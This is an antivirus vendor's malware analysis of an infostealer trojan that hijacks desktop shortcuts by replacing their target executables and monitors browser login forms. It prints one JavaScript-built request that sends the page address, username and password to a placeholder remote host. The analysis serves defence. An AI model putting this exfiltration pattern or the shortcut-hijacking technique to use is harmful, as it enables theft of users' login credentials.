Closer look on TR/Spy.Clickpal.A

We analyzed a Trojan Spy sample because it was interesting how it was spreading through the operating system and the way it sent out stolen information from the user. Right after execution the malware searches for .lnk files existing on the user’s desktop and in the special folders. It then follows the path of the executable to which the file points to and creates a copy of itself in the target directory, using the name of the original file. The original executable is then renamed to “click_%executable name%.exe”. Interesting, the Trojan does not delete the original files, it just renames them.

After the successful infection the malware is executed and starts the renamed executable. This means, the user will usually not notice that the target behind the lnk files is replaced. This is part of the strategy of the Trojan to remain undetected as long as possible.

Microsoft’s Internet Explorer is directly targeted for this action:

The Trojan does not modify registry keys or uses any other method of autorun features provided in the operating system because it’s not necessary due to the fact that the Trojan gets executed immediately when a shortcut is accessed by the user. The memory dump illustrates a list of web address parts which are monitored by the Trojan. In the monitoring process it searches for login forms and login scripts in PHP and ASP scripts.


The stolen login information that gets collected from accessing these web sites is sent to a remote server. In order to do so the Trojan makes use of some JavaScript code. The scripts gather the information about username, password and the current web page and send them to a server located in China. Such a request to the remote address could look like:

http://www2.%RemoteAddress%.cn/dedaoinfo/?info=’+window.location.href+’@@@@’+login.username.value+’@@@@’+login.password.value

Most of the targeted web sites are Chinese web sites such as

  • youku.com
  • tudou.com
  • sogou.com
  • soho.com

As well as global big named Internet sites such as

  • msn.com
  • paypal.com
  • google.com
  • youtube.com
  • yahoo.com

The Trojan itself is written in Visual Basic and is not packed or otherwise obfuscated in any way. Avira protects from this threat and detects it as TR/Spy.Clickpal.A.

Alexandru Dinu
Virus Researcher